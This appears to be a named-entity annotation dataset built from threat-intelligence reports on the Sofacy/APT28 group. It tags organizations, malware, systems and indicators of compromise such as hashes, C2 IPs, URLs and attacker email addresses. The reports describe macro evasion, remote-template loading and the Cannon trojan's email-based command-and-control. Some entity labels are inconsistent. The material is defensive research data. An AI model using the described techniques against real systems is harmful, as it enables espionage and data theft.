{"text": "In this case , we had observed a strange pattern emerging from the Sofacy group over the past year within their command and control infrastructure .", "spans": [{"start": 67, "end": 73, "label": "Organization"}, {"start": 112, "end": 131, "label": "System"}]}
{"text": "Patterning such as reuse of WHOIS artifacts , IP reuse , or even domain name themes are common and regularly used to group attacks to specific campaigns .", "spans": [{"start": 28, "end": 33, "label": "System"}]}
{"text": "In this case , we had observed the Sofacy group registering new domains , then placing a default landing page which they then used repeatedly over the course of the year .", "spans": [{"start": 35, "end": 41, "label": "Organization"}]}
{"text": "No other parts of the C2 infrastructure amongst these domains contained any overlapping artifacts .", "spans": [{"start": 22, "end": 24, "label": "System"}]}
{"text": "Instead , the actual content within the body of the websites was an exact match in each instance .", "spans": []}
{"text": "Specifically , the strings 866-593-54352 ( notice it is one digit too long ) , 403-965-2341 , or the address 522 Clematis .", "spans": []}
{"text": "Suite 3000 was repeatedly found in each instance .", "spans": []}
{"text": "ThreatConnect had made the same observation regarding this patterning in September 2017 .", "spans": [{"start": 0, "end": 13, "label": "System"}]}
{"text": "Hotfixmsupload.com is particularly interesting as it has been identified as a Sofacy C2 domain repeatedly , and was also brought forth by Microsoft in a legal complaint against STRONTIUM ( Sofacy ) as documented here .", "spans": [{"start": 0, "end": 18, "label": "Indicator"}, {"start": 78, "end": 84, "label": "Organization"}, {"start": 85, "end": 87, "label": "System"}, {"start": 138, "end": 147, "label": "Organization"}, {"start": 177, "end": 186, "label": "Organization"}, {"start": 189, "end": 195, "label": "Organization"}]}
{"text": "Leveraging this intelligence allowed us to begin predicting potential C2 domains that would eventually be used by the Sofacy group .", "spans": [{"start": 70, "end": 72, "label": "System"}, {"start": 118, "end": 124, "label": "Organization"}]}
{"text": "In this scenario , the domain cdnverify.net was registered on January 30 , 2018 and just two days later , an attack was launched using this domain as a C2 .", "spans": [{"start": 152, "end": 154, "label": "System"}]}
{"text": "The Sofacy group should no longer be an unfamiliar threat at this stage .", "spans": [{"start": 4, "end": 10, "label": "Organization"}]}
{"text": "They have been well documented and well researched with much of their attack methodologies exposed .", "spans": []}
{"text": "They continue to be persistent in their attack campaigns and continue to use similar tooling as in the past .", "spans": []}
{"text": "This leads us to believe that their attack attempts are likely still succeeding , even with the wealth of threat intelligence available in the public domain .", "spans": []}
{"text": "Application of the data remains challenging , and so to continue our initiative of establishing playbooks for adversary groups , we have added this attack campaign as the next playbook in our dataset .", "spans": []}
{"text": "Palo Alto Networks customers are protected from this threat by :", "spans": [{"start": 0, "end": 18, "label": "Organization"}]}
{"text": "WildFire detects all SofacyCarberp payloads with malicious verdicts .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 21, "end": 34, "label": "Malware"}]}
{"text": "AutoFocus customers can track these tools with the Sofacy , SofacyMacro and SofacyCarberp .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 51, "end": 57, "label": "Organization"}, {"start": 60, "end": 71, "label": "Malware"}, {"start": 76, "end": 89, "label": "Malware"}]}
{"text": "Traps blocks the Sofacy delivery documents and the SofacyCarberp payload .", "spans": [{"start": 17, "end": 23, "label": "Organization"}, {"start": 51, "end": 64, "label": "Malware"}]}
{"text": "SHA256 : ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8 SHA256 : 12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8 SHA256 : cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7 SHA256 : 23411bb30042c9357ac4928dc6fca6955390361e660fec7ac238bbdcc8b83701 Sofacy : Cdnverify.net Sofacy Filename : Upcoming_Events_February_2018.xls .", "spans": [{"start": 9, "end": 73, "label": "Indicator"}, {"start": 83, "end": 147, "label": "Indicator"}, {"start": 157, "end": 221, "label": "Indicator"}, {"start": 231, "end": 295, "label": "Indicator"}, {"start": 296, "end": 302, "label": "Organization"}, {"start": 305, "end": 318, "label": "Indicator"}, {"start": 319, "end": 325, "label": "Organization"}, {"start": 337, "end": 370, "label": "Indicator"}]}
{"text": "APT28 Targets Hospitality Sector , Presents Threat to Travelers .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "Release_Time : 2017-08-11 Report_URL : https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html", "spans": []}
{"text": "FireEye has moderate confidence that a campaign targeting the hospitality sector is attributed to Russian actor APT28 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 112, "end": 117, "label": "Organization"}]}
{"text": "We believe this activity , which dates back to at least July 2017 , was intended to target travelers to hotels throughout Europe and the Middle East .", "spans": []}
{"text": "The actor has used several notable techniques in these incidents such as sniffing passwords from Wi-Fi traffic , poisoning the NetBIOS Name Service , and spreading laterally via the EternalBlue exploit .", "spans": [{"start": 73, "end": 91, "label": "System"}, {"start": 97, "end": 110, "label": "System"}, {"start": 127, "end": 147, "label": "System"}, {"start": 182, "end": 193, "label": "Vulnerability"}]}
{"text": "FireEye has uncovered a malicious document sent in spear phishing emails to multiple companies in the hospitality industry , including hotels in at least seven European countries and one Middle Eastern country in early July .", "spans": [{"start": 0, "end": 7, "label": "Organization"}]}
{"text": "Successful execution of the macro within the malicious document results in the installation of APT28 \u2019s signature GAMEFISH malware .", "spans": [{"start": 28, "end": 33, "label": "System"}, {"start": 95, "end": 100, "label": "Organization"}, {"start": 114, "end": 122, "label": "Malware"}]}
{"text": "The malicious document \u2013 Hotel_Reservation_Form.doc ( MD5 : 9b10685b774a783eabfecdb6119a8aa3 ) , contains a macro that base64 decodes a dropper that then deploys APT28 \u2019s signature GAMEFISH malware ( MD5 : 1421419d1be31f1f9ea60e8ed87277db ) , which uses mvband.net and mvtband.net as command and control ( C2 ) domains .", "spans": [{"start": 25, "end": 51, "label": "Indicator"}, {"start": 60, "end": 92, "label": "Indicator"}, {"start": 108, "end": 113, "label": "System"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 181, "end": 189, "label": "Malware"}, {"start": 206, "end": 238, "label": "Indicator"}, {"start": 254, "end": 264, "label": "Indicator"}, {"start": 269, "end": 280, "label": "Indicator"}, {"start": 284, "end": 303, "label": "System"}, {"start": 306, "end": 308, "label": "System"}]}
{"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 46, "end": 57, "label": "Vulnerability"}, {"start": 91, "end": 100, "label": "System"}]}
{"text": "Once inside the network of a hospitality company , APT28 sought out machines that controlled both guest and internal Wi-Fi networks .", "spans": [{"start": 51, "end": 56, "label": "Organization"}, {"start": 117, "end": 131, "label": "System"}]}
{"text": "No guest credentials were observed being stolen at the compromised hotels ; however , in a separate incident that occurred in Fall 2016 , APT28 gained initial access to a victim \u2019s network via credentials likely stolen from a hotel Wi-Fi network .", "spans": [{"start": 138, "end": 143, "label": "Organization"}, {"start": 232, "end": 245, "label": "System"}]}
{"text": "Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder .", "spans": [{"start": 69, "end": 83, "label": "System"}, {"start": 86, "end": 91, "label": "Organization"}, {"start": 101, "end": 110, "label": "System"}]}
{"text": "Responder facilitates NetBIOS Name Service ( NBT-NS ) poisoning .", "spans": [{"start": 0, "end": 9, "label": "System"}, {"start": 22, "end": 42, "label": "System"}, {"start": 45, "end": 51, "label": "System"}]}
{"text": "This technique listens for NBT-NS ( UDP ) broadcasts from victim computers attempting to connect to network resources .", "spans": [{"start": 27, "end": 33, "label": "System"}, {"start": 36, "end": 39, "label": "Indicator"}]}
{"text": "Once received , Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine .", "spans": [{"start": 16, "end": 25, "label": "System"}]}
{"text": "APT28 used this technique to steal usernames and hashed passwords that allowed escalation of privileges in the victim network .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "To spread through the hospitality company \u2019s network , APT28 used a version of the EternalBlue SMB exploit .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 83, "end": 94, "label": "Vulnerability"}, {"start": 95, "end": 98, "label": "Indicator"}]}
{"text": "This was combined with the heavy use of py2exe to compile Python scripts .", "spans": [{"start": 40, "end": 46, "label": "System"}, {"start": 58, "end": 64, "label": "System"}]}
{"text": "This is the first time we have seen APT28 incorporate this exploit into their intrusions .", "spans": [{"start": 36, "end": 41, "label": "Organization"}]}
{"text": "In the 2016 incident , the victim was compromised after connecting to a hotel Wi-Fi network .", "spans": [{"start": 78, "end": 91, "label": "System"}]}
{"text": "Twelve hours after the victim initially connected to the publicly available Wi-Fi network , APT28 logged into the machine with stolen credentials .", "spans": [{"start": 76, "end": 89, "label": "System"}, {"start": 92, "end": 97, "label": "Organization"}]}
{"text": "These 12 hours could have been used to crack a hashed password offline .", "spans": []}
{"text": "After successfully accessing the machine , the attacker deployed tools on the machine , spread laterally through the victim's network , and accessed the victim's OWA account .", "spans": [{"start": 162, "end": 165, "label": "System"}]}
{"text": "The login originated from a computer on the same subnet , indicating that the attacker machine was physically close to the victim and on the same Wi-Fi network .", "spans": [{"start": 146, "end": 159, "label": "System"}]}
{"text": "We cannot confirm how the initial credentials were stolen in the 2016 incident ; however , later in the intrusion , Responder was deployed .", "spans": [{"start": 116, "end": 125, "label": "System"}]}
{"text": "Since this tool allows an attacker to sniff passwords from network traffic , it could have been used on the hotel Wi-Fi network to obtain a user \u2019s credentials .", "spans": [{"start": 59, "end": 74, "label": "System"}, {"start": 114, "end": 127, "label": "System"}]}
{"text": "Cyber espionage activity against the hospitality industry is typically focused on collecting information on or from hotel guests of interest rather than on the hotel industry itself , though actors may also collect information on the hotel as a means of facilitating operations .", "spans": []}
{"text": "Business and government personnel who are traveling , especially in a foreign country , often rely on systems to conduct business other than those at their home office , and may be unfamiliar with threats posed while abroad .", "spans": []}
{"text": "APT28 isn\u2019t the only group targeting travelers .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "South Korea nexus Fallout Team ( aka Darkhotel ) has used spoofed software updates on infected Wi-Fi networks in Asian hotels , and Duqu 2.0 malware has been found on the networks of European hotels used by participants in the Iranian nuclear negotiations .", "spans": [{"start": 18, "end": 30, "label": "Organization"}, {"start": 37, "end": 46, "label": "Organization"}, {"start": 95, "end": 109, "label": "System"}, {"start": 132, "end": 140, "label": "Malware"}]}
{"text": "Additionally , open sources have reported for several years that in Russia and China , high-profile hotel guests may expect their hotel rooms to be accessed and their laptops and other electronic devices accessed .", "spans": []}
{"text": "These incidents show a novel infection vector being used by APT28 .", "spans": [{"start": 60, "end": 65, "label": "Organization"}]}
{"text": "The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges .", "spans": [{"start": 42, "end": 56, "label": "System"}, {"start": 84, "end": 104, "label": "Organization"}]}
{"text": "APT28 \u2019s already wide-ranging capabilities and tactics are continuing to grow and refine as the group expands its infection vectors .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]}
{"text": "Travelers must be aware of the threats posed when traveling \u2013 especially to foreign countries \u2013 and take extra precautions to secure their systems and data .", "spans": []}
{"text": "Publicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible .", "spans": [{"start": 20, "end": 34, "label": "System"}]}
{"text": "Sofacy Continues Global Attacks and Wheels Out New Cannon Trojan .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 51, "end": 57, "label": "System"}, {"start": 58, "end": 64, "label": "Malware"}]}
{"text": "Release_Time : 2018-11-20", "spans": []}
{"text": "Report_URL : https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/", "spans": []}
{"text": "In late October and early November 2018 , Unit 42 intercepted a series of weaponized documents that use a technique to load remote templates containing a malicious macro .", "spans": [{"start": 42, "end": 49, "label": "Organization"}, {"start": 154, "end": 169, "label": "System"}]}
{"text": "These types of weaponized documents are not uncommon but are more difficult to identify as malicious by automated analysis systems due to their modular nature .", "spans": []}
{"text": "Specific to this technique , if the C2 server is not available at the time of execution , the malicious code cannot be retrieved , rendering the delivery document largely benign .", "spans": [{"start": 36, "end": 38, "label": "System"}]}
{"text": "The weaponized documents targeted several government entities around the globe , including North America , Europe , and a former USSR state .", "spans": []}
{"text": "Fortunately for us , the C2 servers for several of these documents were still operational allowing for retrieval of the malicious macro and the subsequent payloads .", "spans": [{"start": 25, "end": 27, "label": "System"}, {"start": 120, "end": 135, "label": "System"}]}
{"text": "Analysis revealed a consistent first-stage payload of the well-documented Zebrocy Trojan .", "spans": [{"start": 74, "end": 81, "label": "Malware"}, {"start": 82, "end": 88, "label": "Malware"}]}
{"text": "Additional collection of related documents revealed a second first-stage payload that we have named \u2018 Cannon \u2019 .", "spans": [{"start": 102, "end": 108, "label": "Malware"}]}
{"text": "Cannon has not been previously observed in use by the Sofacy group and contains a novel email-based C2 communication channel .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 54, "end": 60, "label": "Organization"}, {"start": 100, "end": 102, "label": "System"}]}
{"text": "email as a C2 channel is not a new tactic , but it is generally not observed in the wild as often as HTTP or HTTPS .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 11, "end": 13, "label": "System"}, {"start": 101, "end": 105, "label": "Indicator"}, {"start": 109, "end": 114, "label": "Indicator"}]}
{"text": "Using email as a C2 channel may also decrease the chance of detection , as sending email via non-sanctioned email providers may not necessarily construe suspicious or even malicious activity in many enterprises .", "spans": [{"start": 6, "end": 11, "label": "System"}, {"start": 17, "end": 19, "label": "System"}, {"start": 83, "end": 88, "label": "System"}, {"start": 108, "end": 113, "label": "System"}]}
{"text": "The activity discussed in this blog revolves around two of the multitude of weaponized documents that we collected .", "spans": []}
{"text": "These two documents shared multiple data artifacts , such as a shared C2 IP , shared author name , and shared tactics .", "spans": [{"start": 70, "end": 72, "label": "System"}]}
{"text": "Details of the extended attack campaign associated with the Cannon Trojan will be discussed in a later blog .", "spans": [{"start": 60, "end": 66, "label": "Malware"}, {"start": 67, "end": 73, "label": "Malware"}]}
{"text": "A particularly interesting aspect of one of the two documents we analyzed was the filename used , crash list ( Lion Air Boeing 737 ).docx .", "spans": [{"start": 98, "end": 137, "label": "Indicator"}]}
{"text": "This is not the first instance of an adversary group using recent current events as a lure , but it is interesting to see this group attempt to capitalize on the attention of a catastrophic event to execute their attack .", "spans": []}
{"text": "The initial sample we intercepted was a Microsoft Word document ( SHA256 : 2cfc4b3686511f959f14889d26d3d9a0d06e27ee2bb54c9afb1ada6b8205c55f ) with the filename crash list ( Lion Air Boeing 737 ).docx using the author name Joohn .", "spans": [{"start": 40, "end": 49, "label": "Organization"}, {"start": 50, "end": 54, "label": "System"}, {"start": 75, "end": 139, "label": "Indicator"}, {"start": 160, "end": 199, "label": "Indicator"}]}
{"text": "This document appeared to be targeting a government organization dealing with foreign affairs in Europe via spear-phishing .", "spans": []}
{"text": "Once the user attempts to open the document , Microsoft Word immediately attempts to load the remote template containing a malicious macro and payload from the location specified within the settings.xml.rels file of the DOCX document .", "spans": [{"start": 46, "end": 55, "label": "Organization"}, {"start": 56, "end": 60, "label": "System"}, {"start": 123, "end": 138, "label": "System"}, {"start": 190, "end": 207, "label": "Indicator"}, {"start": 220, "end": 224, "label": "System"}]}
{"text": "If the C2 has already been taken offline the document will still open , but Word will be unable to retrieve the remote template and thus Word will not load a macro .", "spans": [{"start": 7, "end": 9, "label": "System"}, {"start": 76, "end": 80, "label": "System"}, {"start": 137, "end": 141, "label": "System"}, {"start": 158, "end": 163, "label": "System"}]}
{"text": "In this situation , Word will present the same lure document to the victim as seen in Figure 2 , but without the ability to enable macros via an Enable Content button .", "spans": [{"start": 20, "end": 24, "label": "System"}, {"start": 131, "end": 137, "label": "System"}, {"start": 145, "end": 166, "label": "System"}]}
{"text": "Assuming the C2 is still operational however , Word loads the remote template ( SHA256 : f1e2bceae81ccd54777f7862c616f22b581b47e0dda5cb02d0a722168ef194a5 ) and the user is presented with the screen .", "spans": [{"start": 13, "end": 15, "label": "System"}, {"start": 47, "end": 51, "label": "System"}, {"start": 89, "end": 153, "label": "Indicator"}]}
{"text": "Once the victim presses the Enable content button , the embedded macro is executed .", "spans": [{"start": 28, "end": 49, "label": "System"}, {"start": 65, "end": 70, "label": "System"}]}
{"text": "The macros used for these delivery documents use a less common method of using the AutoClose function .", "spans": [{"start": 4, "end": 10, "label": "System"}]}
{"text": "This is a form of anti-analysis as Word will not fully execute the malicious code until the user closes the document .", "spans": [{"start": 35, "end": 39, "label": "System"}]}
{"text": "If an automated sandbox exits its analysis session without specifically closing out the document , the sandbox may miss the malicious activity entirely .", "spans": []}
{"text": "Once successfully executed , the macro will install a payload and save a document to the system .", "spans": [{"start": 33, "end": 38, "label": "System"}]}
{"text": "Typically , we expect to see a decoy document saved to the system and later displayed to make the victim less suspicious of malicious activity ; however , in this case the document saved to the system was never displayed and does not contain any pertinent content to the Lion Air tragedy theme seen in the filename .", "spans": [{"start": 271, "end": 279, "label": "Organization"}]}
{"text": "The macro obtains the document saved to the system from within the document stored as UserForm1.Label1.Caption and will write it to : %TEMP%\\~temp.docm .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 86, "end": 110, "label": "Indicator"}, {"start": 134, "end": 151, "label": "Indicator"}]}
{"text": "The macro obtains the payload saved to the system from within the document stored as UserForm1.Label2.Caption and will write it to : %APPDATA%\\MSDN\\~msdn.exe .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 85, "end": 109, "label": "Indicator"}, {"start": 133, "end": 157, "label": "Indicator"}]}
{"text": "The macro executes this payload in a rather interesting way by loading the dropped ~temp.docm document and calling a function within its embedded macro to run the payload .", "spans": [{"start": 4, "end": 9, "label": "System"}, {"start": 83, "end": 93, "label": "Indicator"}]}
{"text": "We believe the creator of this delivery document chose to run the payload from the dropped file as an evasion technique .", "spans": []}
{"text": "Also , the fact the initial macro uses this dropped document for the execution of the payload may also explain why the document did not contain any decoy contents .", "spans": [{"start": 28, "end": 33, "label": "System"}]}
{"text": "To carry out this functionality , after writing the", "spans": []}
{"text": "~temp.docm and ~msdn.exe files to the system , the initial macro will load the ~temp.docm file as a Word Document object and attempts to run the function Proc1 in the Module1 macro within the ~temp.docm file .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 15, "end": 24, "label": "Indicator"}, {"start": 59, "end": 64, "label": "System"}, {"start": 79, "end": 89, "label": "Indicator"}, {"start": 100, "end": 104, "label": "System"}, {"start": 175, "end": 180, "label": "System"}, {"start": 192, "end": 202, "label": "Indicator"}]}
{"text": "The Proc1 function within the Module1 does nothing more than build the %APPDATA%\\MSDN\\~msdn.exe path to the dropped payload and executes it using the built-in Shell function .", "spans": [{"start": 71, "end": 95, "label": "Indicator"}]}
{"text": "The payload dropped to the system ( SHA256 : 6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a ) is a UPX packed Zebrocy variant written in the Delphi language .", "spans": [{"start": 45, "end": 109, "label": "Indicator"}, {"start": 117, "end": 120, "label": "System"}, {"start": 128, "end": 135, "label": "Malware"}, {"start": 159, "end": 165, "label": "System"}]}
{"text": "This variant of Zebrocy is functionally very similar to the Delphi based payloads discussed in our previous publication on Sofacy attacks using Zebrocy earlier this year .", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 60, "end": 66, "label": "System"}, {"start": 123, "end": 129, "label": "Organization"}, {"start": 144, "end": 151, "label": "Malware"}]}
{"text": "The developer of this particular payload configured it to use the following URL to communicate with as its C2 : http://188.241.58.170/local/s3/filters.php .", "spans": [{"start": 107, "end": 109, "label": "System"}, {"start": 112, "end": 154, "label": "Indicator"}]}
{"text": "The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 12, "end": 18, "label": "Malware"}, {"start": 80, "end": 82, "label": "System"}]}
{"text": "Like other Zebrocy samples , this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 34, "end": 40, "label": "Malware"}, {"start": 98, "end": 100, "label": "System"}]}
{"text": "This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server .", "spans": [{"start": 25, "end": 32, "label": "Malware"}, {"start": 85, "end": 89, "label": "System"}, {"start": 103, "end": 105, "label": "System"}]}
{"text": "The C2 server will then provide a secondary payload to the beacon in ASCII hexadecimal representation , which the Trojan will decode and write to the following location : %APPDATA%\\Roaming\\Audio\\soundfix.exe .", "spans": [{"start": 4, "end": 6, "label": "System"}, {"start": 69, "end": 74, "label": "System"}, {"start": 114, "end": 120, "label": "Malware"}, {"start": 171, "end": 207, "label": "Indicator"}]}
{"text": "During our analysis , the C2 server provided a secondary payload that functionally appeared similar to the initial Zebrocy sample .", "spans": [{"start": 26, "end": 28, "label": "System"}, {"start": 115, "end": 122, "label": "Malware"}]}
{"text": "The secondary payload was also written in Delphi and its developer configured it to communicate with its C2 server using HTTPS via the following URL : https://200.122.181.25/catalog/products/books.php .", "spans": [{"start": 42, "end": 48, "label": "System"}, {"start": 105, "end": 107, "label": "System"}, {"start": 121, "end": 126, "label": "Indicator"}, {"start": 151, "end": 200, "label": "Indicator"}]}
{"text": "We were able to collect a second delivery document that shared the Joohn author from the crash list ( Lion Air Boeing 737 ).docx document , as well as the 188.241.58.170 C2 IP to host its remote template .", "spans": [{"start": 89, "end": 128, "label": "Indicator"}, {"start": 155, "end": 169, "label": "Indicator"}, {"start": 170, "end": 172, "label": "System"}]}
{"text": "Structurally this sample was very similar to the initially analyzed document , but the payload turned out to be a completely new tool which we have named Cannon .", "spans": [{"start": 154, "end": 160, "label": "Malware"}]}
{"text": "The tool is written in C# whose malicious code exists in a namespace called cannon , which is the basis of the Trojan \u2019s name .", "spans": [{"start": 23, "end": 25, "label": "System"}, {"start": 76, "end": 82, "label": "Malware"}, {"start": 111, "end": 117, "label": "Malware"}]}
{"text": "The Trojan functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 62, "end": 68, "label": "System"}, {"start": 96, "end": 102, "label": "Malware"}, {"start": 111, "end": 113, "label": "System"}]}
{"text": "To communicate with the C2 server , the Trojan will send emails to specific email addresses via SMTPS over TCP port 587 .", "spans": [{"start": 24, "end": 26, "label": "System"}, {"start": 40, "end": 46, "label": "Malware"}, {"start": 57, "end": 63, "label": "System"}, {"start": 76, "end": 81, "label": "System"}, {"start": 96, "end": 101, "label": "Indicator"}, {"start": 107, "end": 110, "label": "Indicator"}]}
{"text": "This tool also has a heavy reliance on EventHandlers with timers to run its methods in a specific order and potentially increase its evasion capability .", "spans": []}
{"text": "The overall purpose of Cannon is to use several email accounts to send system data ( system information and screenshot ) to the threat actors and to ultimately obtain a payload from an email from the actors .", "spans": [{"start": 23, "end": 29, "label": "Malware"}, {"start": 48, "end": 53, "label": "System"}, {"start": 185, "end": 190, "label": "System"}]}
{"text": "In addition to the following step-by-step process illustrates how Cannon communicates with the actor-controlled C2 email address to obtain a secondary payload .", "spans": [{"start": 66, "end": 72, "label": "Malware"}, {"start": 112, "end": 114, "label": "System"}, {"start": 115, "end": 120, "label": "System"}]}
{"text": "Cannon gathers system information and saves it to a file named ini .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]}
{"text": "The Trojan sends an email to sahro.bella7@post.cz with i.ini as the attachment , S_inf within the body and a subject with a unique system identifier via SMTPS from one of the following accounts : Bishtr.cam47 , Lobrek.chizh , Cervot.woprov .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 20, "end": 25, "label": "System"}, {"start": 29, "end": 49, "label": "Indicator"}, {"start": 55, "end": 60, "label": "Indicator"}, {"start": 153, "end": 158, "label": "Indicator"}, {"start": 196, "end": 208, "label": "Indicator"}, {"start": 211, "end": 223, "label": "Indicator"}, {"start": 226, "end": 239, "label": "Indicator"}]}
{"text": "Cannon takes a screenshot and saves it to a file named ops .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]}
{"text": "The Trojan sends an email to sahro.bella7@post.cz with sysscr.ops as the attachment , the string SCreen within the body and a subject with the unique system identifier via SMTPS from one of three previously used accounts .", "spans": [{"start": 4, "end": 10, "label": "Malware"}, {"start": 20, "end": 25, "label": "System"}, {"start": 29, "end": 49, "label": "Indicator"}, {"start": 55, "end": 65, "label": "Indicator"}, {"start": 172, "end": 177, "label": "Indicator"}]}
{"text": "The actors likely log into sahro.bella7@post.cz and process the system information and screenshot sent by the Trojan to determine if the compromised host is of interest .", "spans": [{"start": 27, "end": 47, "label": "Indicator"}, {"start": 110, "end": 116, "label": "Malware"}]}
{"text": "If the actor wishes to download an additional payload to the compromised host , they will respond by sending emails in the following steps .", "spans": [{"start": 109, "end": 115, "label": "System"}]}
{"text": "The actor sends an email to trala.cosh2@post.cz with the unique system identifier as a subject with a secondary email account and credentials in ASCII hexadecimal format within the message body .", "spans": [{"start": 19, "end": 24, "label": "System"}, {"start": 28, "end": 47, "label": "Indicator"}, {"start": 112, "end": 117, "label": "System"}, {"start": 145, "end": 150, "label": "System"}]}
{"text": "This secondary email account is unknown at this time , so we will refer to it as \u201c secondary email account \u201d in future steps .", "spans": [{"start": 15, "end": 20, "label": "System"}, {"start": 93, "end": 98, "label": "System"}]}
{"text": "The actor sends an email to the secondary email account with the unique system identifier as a subject with a secondary payload attached with a filename of txt .", "spans": [{"start": 19, "end": 24, "label": "System"}, {"start": 42, "end": 47, "label": "System"}, {"start": 156, "end": 159, "label": "System"}]}
{"text": "Cannon logs into the trala.cosh2@post.cz account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 21, "end": 40, "label": "Indicator"}, {"start": 53, "end": 58, "label": "Indicator"}, {"start": 71, "end": 77, "label": "System"}]}
{"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the secondary email account .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 17, "end": 22, "label": "System"}, {"start": 132, "end": 137, "label": "System"}]}
{"text": "Cannon acknowledges the receipt of the secondary email address by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 49, "end": 54, "label": "System"}, {"start": 77, "end": 82, "label": "System"}, {"start": 86, "end": 106, "label": "Indicator"}, {"start": 112, "end": 117, "label": "Indicator"}, {"start": 243, "end": 248, "label": "Indicator"}]}
{"text": "The actor sends an email to trala.cosh2@post.cz with the unique system identifier as a subject with a file path that the Cannon Trojan will use to save the secondary payload .", "spans": [{"start": 19, "end": 24, "label": "System"}, {"start": 28, "end": 47, "label": "Indicator"}, {"start": 121, "end": 127, "label": "Malware"}, {"start": 128, "end": 134, "label": "Malware"}]}
{"text": "Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 31, "end": 36, "label": "System"}, {"start": 49, "end": 54, "label": "Indicator"}, {"start": 67, "end": 73, "label": "System"}]}
{"text": "Cannon opens the email with the correct subject and saves the attachment named auddevc.txt .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 17, "end": 22, "label": "System"}, {"start": 79, "end": 90, "label": "Indicator"}]}
{"text": "Cannon acknowledges the receipt of file download by sending an email to sahro.bella7@post.cz with l.txt ( contains 090 string ) as the attachment , ok2 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 63, "end": 68, "label": "System"}, {"start": 72, "end": 92, "label": "Indicator"}, {"start": 98, "end": 103, "label": "Indicator"}, {"start": 220, "end": 225, "label": "Indicator"}]}
{"text": "Cannon logs into the trala.cosh2@post.cz account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 21, "end": 40, "label": "Indicator"}, {"start": 53, "end": 58, "label": "Indicator"}, {"start": 71, "end": 77, "label": "System"}]}
{"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 17, "end": 22, "label": "System"}, {"start": 172, "end": 183, "label": "Indicator"}]}
{"text": "Cannon acknowledges the receipt of file path by sending an email to sahro.bella7@post.cz with s.txt ( contains {SysPar = 65} string ) as the attachment , ok3 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 59, "end": 64, "label": "System"}, {"start": 68, "end": 88, "label": "Indicator"}, {"start": 94, "end": 99, "label": "Indicator"}, {"start": 226, "end": 231, "label": "Indicator"}]}
{"text": "Cannon moves the downloaded file to the specified path .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]}
{"text": "Cannon acknowledges the successful move by sending an email to sahro.bella7@post.cz with l.txt ( contains 090 string ) as the attachment , ok4 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 54, "end": 59, "label": "System"}, {"start": 63, "end": 83, "label": "Indicator"}, {"start": 89, "end": 94, "label": "Indicator"}, {"start": 211, "end": 216, "label": "Indicator"}]}
{"text": "Cannon runs the downloaded file from the specified path .", "spans": [{"start": 0, "end": 6, "label": "Malware"}]}
